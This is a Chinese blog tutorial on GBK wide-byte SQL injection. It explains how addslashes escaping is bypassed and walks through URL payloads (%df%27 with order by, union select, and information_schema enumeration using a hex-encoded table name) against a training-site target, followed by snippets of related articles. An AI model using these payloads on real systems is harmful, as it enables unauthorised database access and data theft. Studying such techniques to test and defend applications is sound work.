宽字节注入

最新推荐文章于 2025-04-30 23:21:27 发布
最新推荐文章于 2025-04-30 23:21:27 发布
阅读量305 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44300286/article/details/102239514
版权

0x01前言

之前学基本注入的时候,就没有考虑过单引号或双引号被转义的情况,今天就来补充一下这方面的知识。

在学习宽字节注入前,我们先了解一个函数addslashes:

string addslashes ( string $str )

返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。
这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。

在sql注入时,这个函数会把你输入的sql语句中的单引号(’),双引号(")等特殊字符转义掉,使之变成字符串,这个时候就需要用到宽字节注入。

0x02宽字节注入原理

宽字节注入是利用MySQL的一个特性,MySQL在使用GBK编码时,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围)

例:
在这里插入图片描述
%df%5C会被当成一个汉字,此时单引号%27就会逃过一劫。

0x03实践

实践链接:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

当输入id=1%27时,根据回显内容可知,单引号(’)被转义成了\'
在这里插入图片描述
这时就要宽字节注入了,输入id=1%df%27,这时sql语句为

select id,title from news where id = '1%df%5C''

MySQL使用GBK编码时,把%df%5C当成了一个汉字,因此sql语句就变成了

select id,title from news where id = '1運''

在这里插入图片描述
输入id=1%df%27%23,发现页面回显正常,这时就可以正常注入了。在这里插入图片描述
接下来就是正常的基本注入:

id=1%df%27 order by 2 %23

id=-1%df%27 union select 1,2 %23

id=-1%df%27 union select 1,database() %23

id=-1%df%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() %23

直到爆字段名时,由于单引号(’)会被转义,所以需要把表名用16进制表示(假设这里表名为news):

一般写法:
id=-1%df%27 union select 1,group_concat(column_name) from information_schema.columns where table_name=’news‘ %23

表名用16进制表示:
id=-1%df%27 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x6e657773 %23

这样就避免了引号被转义,同时还达到了我们想要的目的。

后面的操作跟基本注入一样,这里就不继续了。

0x04总结

总的来说,宽字节注入最主要的就是利用MySQL的GBK编码的特性,让反斜杠(\)和其他的一个字符组成一个汉字,从而使单引号(’),双引号(")等逃过被转义的命运。

obsetear
关注
【漏洞挖掘】——117、宽字节注入深入刨析
Fly_鹏程万里
06-26 251
窄字节:字符的大小为一个字节时,称其字符为窄字节宽字节:字符的大小为两个字节时,称其字符为宽字节宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等宽字节注入主要是源于程序员设置数据库编码与PHP编码设置为不同的两个编码格式从而导致产生宽字节注入,例如:在使用PHP连接MySQL的时候,很多人都会增加一句。
SQL注入——宽字节注入
weixin_41487522的博客
04-20 258
SQL注入——宽字节注入 今天我们介绍宽字注入。 在此之前先说一下GBK编码格式。 什么是GBK编码格式? 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外的一些cms,仍然使用自己的一套编码,比如我国的GBK,作为自己默认的编码类型。也有一些cms为了考虑老用户,推出了GBK和UTF-8两个版本(例如,dedecm...
sql注入宽字节注入
m0_52484587的博客
07-11 1092
str:需要添加反斜线的字符串。
突破SQL注入字符转义的实战指南:绕过技巧与防御策略
最新发布
w2361734601的博客
04-30 1163
绕过字符转义的核心思路是​​灵活利用数据库特性和协议层的“非预期行为”​​。攻击者可能通过编码、二次注入甚至WAF规则绕过实现突破,而开发者需从预编译语句、输入校验等层面构建多层防御。
白话宽字节注入-以彼之道,还施彼身
u011975363的专栏
09-14 618
在正式了解宽字节注入前,咱先简单了解下相关知识:简单知识(1)宽字节:两个字节,代表宽字节编码。 (2)宽字节注入属于sql注入攻击。 (3)字符编码:ASCII:127个字符,每个字符用一个字节表示 , Unicode:最常用的两个字节表示一个字符,如果非常生僻的字符用4个字节表示, UTF-8:根据unicode字符根据不同的数字大小编1-6个字节,常用的英文的字母为1个字节,汉字通
宽字节注入漏洞因与防护
我们好像在哪见过
07-22 952
参考链接: (1)漏洞银行 [3期]浅析宽字节注入 https://www.bugbank.cn/live/view.html?id=109301 (2)大部分来自于SQL注入宽字节注入(GBK双字节绕过)这篇文章,仅仅用于个人思路梳理与总结。https://lyiang.wordpress.com/2015/06/09/sql%E6%B3%A8%E5%85%A5%EF%BC%9A%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%EF%BC%88gbk%E5%8F
记一次墨者学院sql手工宽字节注入(包含使用sqlmap宽字节注入)
qq_56035503的博客
07-26 990
总的来说使用sqlmap的前提是需要知道当前漏洞注入是属于宽字节注入才行,所以也间接证明了手动注入学习的重要性,只有知道了注入的原理,才能正确的使用脚本,同时sql内容的学习也极其关键,如果不能明白其中的原理,在实战中也不发现不了其中的问题。
【新手入门】SQL注入宽字节注入
2401_89344791的博客
12-27 1418
说到宽字节注入,我们首先要了解一下编码,那么都有哪些编码呢?url编码、ascii码、gbk和utf8编码。ASCII码使用7位二进制数表示128个字符,包括英文字母、数字、标点符号、控制字符等。,不支持中文。URL 是一个字符序列,由数字、字母和特殊字符组
mysql中的宽字符注入_深入理解Mysql宽字符注入
weixin_32452127的博客
02-10 304
之前记录过一篇 写的不够详细概念宽字节是相对于ascII这样单字节而言的;像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节GBK是一种多字符的编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节原理mysql在使用GBK编码会认为两个字符为一个汉字,只要前一个字符的ascii码>128就是汉字的编...
四、注入(5)宽字节注入
weixin_45540609的博客
04-18 393
一、魔术引号 magic_quotes_gpc 魔术引号开关,判断解析用户提交的数据,包括post、get、cookie过来的数据增加转义字符“\”,确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现的致命错误 单引号,双引号,反斜杠\都会被加上反斜杠 在php5.4以下有魔术引号,其它选项菜单-打开配置文件-php-ini-写入magic_quotes_gpc = on-重启 5.4以上版本变了函数addslashes() 绕过: 1、找不需要闭合的地...
SQL注入宽字节注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-28 301
文章目录前言一、环境二、宽字节注入漏洞代码三、宽字节注入原理四、宽字节注入漏洞测试 前言 在注入时通常会使用单引号、双引号等特殊字符。在应用中,通常为了安全,开发者会开启php的magic_quotes_gpc,或者使用addslashes、mysql_real_escape_string等函数对客户端传入的参数进行过滤,则注入的单引号或双引号就会被"\"转义,但是,如果服务端的数据库使用的是GB2312、GBK、GB18030等宽字节的编码时,则依然会造注入。 一、环境 PHP 5.4.45
【SQL注入漏洞-09】宽字节注入靶场实战
cc
02-07 5708
如果数据库使用的是DBK编码,而PHP使用的是UTF-8编码 ,那这样就可能出现注入问题。原因是程序员为了防止SQL注入,就会调用addslashes转移函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上转义字符(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF-8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和转义字符(\)组合被当作一个汉字,从而保留单或双引号功进行宽字节注入
mysql宽字节注入_转宽字节注入详解
weixin_31514917的博客
01-28 178
在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。首先,宽字节注入与HTML页面编码是无关的,笔者曾经看到<meta charset=utf8>就放弃了尝试,这是一个误区,SQL注入不是XSS。虽然他们中编码的...
SQL注入之盲注/宽字节注入
m0_55854679的博客
02-06 2418
文章目录什么是盲注?布尔盲注时间盲注盲注函数演示语句 常见web漏洞——SQL注入 什么是盲注? 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。 时间盲注其实和布尔盲注其实没有什么太大的区别,只不过是一个依靠页面是否正常判断,一个是否延时判断,在操作上其实也差不多,只不过时间注入多一个if() 布尔盲注 布尔很明显就是true和false,也就是说它只会根据信息返回true和false,也就是没有了之前的报错信息。 时间盲注 界面返回值
宽字节注入2
qq_43776408的博客
07-07 307
注入基础 之前我们在1中讲了使用%df 但是没必要总是使用%df 可以使用其他的 注入代码分析 下图第一个函数是替换单引号和双引号 即将单引号前加斜杠 双引号前加斜杠 函数功能其实和本身自带函数功能一样 记住 宽字节注入mysql必须是gbk编码 SQL注入演示 Sqlmap安全测试 下面那个py文件是专门用于测试宽字节注入 探测出来之后你可以使用–dbs等继续获取信息 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值